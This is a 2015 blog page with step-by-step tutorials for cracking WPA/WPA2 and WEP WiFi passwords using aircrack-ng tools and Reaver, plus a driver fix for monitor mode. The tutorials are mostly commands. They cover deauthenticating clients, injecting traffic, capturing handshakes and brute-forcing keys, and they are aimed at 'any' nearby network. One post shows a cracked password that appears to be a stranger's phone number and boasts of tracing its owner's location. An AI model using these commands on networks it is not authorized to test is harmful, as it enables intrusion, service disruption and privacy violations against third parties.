Tuesday, 14 July 2015

How To Hack WAP or WPA2 WiFi Security Fully Explained

12:44 pm
As Compared to WEP WiFi Hacking as explained on our previous tutorial, WPA/WPA2 is quite difficult and time consuming because of its Security. Cracking the password sometimes depends on your luck and success is not guaranteed.

..:: How to launch a Dictionary Attack on WPA Handshake ::..

You might get lucky and your nearest WiFi password may be based on a common dictionary word or number sequence. In such a case, you may succeed with a dictionary attack.

Step 1: Enable monitor mode on wireless interface

#airmon-ng start wlan0

This will start the monitor mode.

Step 2: Take note of the nearest WiFi networks.

#airodump-ng mon0

Step 3: Take note of the channel of your target network, dump packets from that channel and save them to a local capture file.

#airodump-ng -c6 mon0 -w capture_file

Step 4: Wait for WPA handshake capture

At this point, you can use 'aireplay-ng' to de-authenticate an associated legitimate client from the network. The point is that as he/she will authenticate again shortly, we will capture the handshake without having to wait too long:

#aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0

If you don't know the MAC of any associated client, simply 'broadcast' a 'deauth' to all clients:

#aireplay-ng --deauth 0 -a <AP_MAC> mon0

Step 5: After you grab a WPA handshake comes the hard part of brute forcing using a dictionary. Use 'aircrack-ng' for this:

#aircrack-ng capture_file-01.cap -w listfile.lst

Now say your prayers and hope the passphrase is present in the dictionary you choose.

You can also use online distributed WPA/WPA2 handshake cracking tool on this website:

Note that if the Access Point has WPS Enabled, it becomes easier to recover the WPA / WPA2 passphrase as there are only 11,000 possible combinations needed to brute force the WPS PIN due to an implementation flaw.

Another tool called 'Reaver' can be used for WPA cracking, if WPS is enabled.

Here's the sample use of reaver:

#reaver -i mon1 -a 94:D7:23:48:BE:78 -vv -c8

-i is for interface
-a "94.... " is the bssid of hotspot
-vv for verbose mode
-c to specify the channel

Disclaimer: This is for experimentation or authorized penetration testing purposes only.

Tutorial by : Pranshu

How To Hack WEP WiFi Security Fully Explained

11:48 am
Hello Friends, Today We are going to learn the methods to hack any WEP WiFi by cracking its Password.

WiFi Security mostly contains WEP, WPA or WPA2 Psk Security. Out of which WEP is the weakest and the easiest to hack while WPA and WPA2 contains advance Encryption Security. In this tutorial we will cover WEP Hacking.

Things Required -> Backtrack or Kali Linux

..:: WEP Cracking ::..

No doubt, WEP is the easiest to crack .Here's how to crack WEP:

Step 1 : First we need to start the Monitoring Mode. Many people may face the no interface issues while giving the command airmon-ng so check the solution here -> http://sh.st/cXO1I

#airmon-ng start wlan0

Notice that the monitor mode is enabled on mon1 on wlan0 ,take note of this. We will need this interface later on.

Step 2 : Now Start dumping data packets with airodump

#airodump-ng mon1

You'll see all the WiFi Channels available in your area. Here we see different security like WEP, WPA and WPA 2. So we are going to use WEP.

Also, it is important to note other information here as that will determine how easily you get into the WiFi: 
  • The BSSID is the MAC address of the WiFi Network. 
  • Pwr tells you about the signal strength. 
  • Beacon signals are sent by the hotspot to indicate its presence. 
  • Data is the actual packets that we are interested in. The more data packets we have, the more certain we are to crack the hotspot. 
  • CH tells you the channel being used by the hotspot.
So I use airodump to focus on dumping packets from this paricular BSSID and store them in a file:

#airodump-ng -w wap -c 8 --bssid 14:D6:4D:A6:F6:69 mon1

-w specifies the file to write to, -c specifies the channel and you know what --bssid is for

Now capturing packets starts, and we play the waiting game. Wait to collect enough packets before trying to crack the password. Usually, we wait till we grab around 20000 packets.

How long this takes depends on the traffic flow on that BSSID and your distance from the BSSID.

STEP 3 : If it is taking too long to grab required number of packets, then you can use something called aireplay:

#aireplay-ng -b 14:D6:4D:A6:F6:69 -h 00:11:22:33:44:55 mon1

-b option is to specify the bssid

-h is to specify your hardware address

aireplay-ng will start generating bogus traffic, so that you can grab enough data packets fast.

STEP 4 : Now that we have enough data packets (42445), we can start cracking the password.

#aircrack-ng wap-02.cap

This wap-02 cap file is the name of the file in which we are saving the captured packets:

Now you just need to wait for sometime and Aircrack-ng will give you the cracked password:

So as we can see, the password is 9212173318. It seems its someone's cell phone number. I traced its location and it's based in Delhi. A bad practice to use personal information as password.

Hope you all enjoyed the tutorial. Any queries comment below or visit us at https://www.facebook.com/kiithackers

Credits > Pranshu

Resolution Airmon-ng showing No Interface

10:35 am
Today we are going to show you all a solution for the most common Error people face while performing Airmon-ng i.e. there will be no interface as shown below :

So how to fix this issue?

Step 1 : Before starting Make sure that you have Internet connection on your Backtrack or Kali Linux machine.If you are using  VM then make sure your VM network adapter is Bridged with the Physical Network.

Step 2 : Next Click here : http://linuxwireless.org/download/compat-wireless-2.6/ and Download compat-wireless-2010-06-26-p.tar.bz2 file on your Backtrack or Kali Machine.

Step 3 : After downloading we have to extract the file since its in compressed form(*.tar).so to extract it Go to the path where you have saved that file and then give the command :

tar -jxvf compat-wireless-2010-06-26-p.tar.bz2

Step 4 : After extracting go to that folder that is created after extraction, and give the command > make unload and then make load (for loading the new interface) and now you will be able to see the interface.

Checkout the Video for more clarification :

Feel free to comment below your queries.

Contact us


Email *

Message *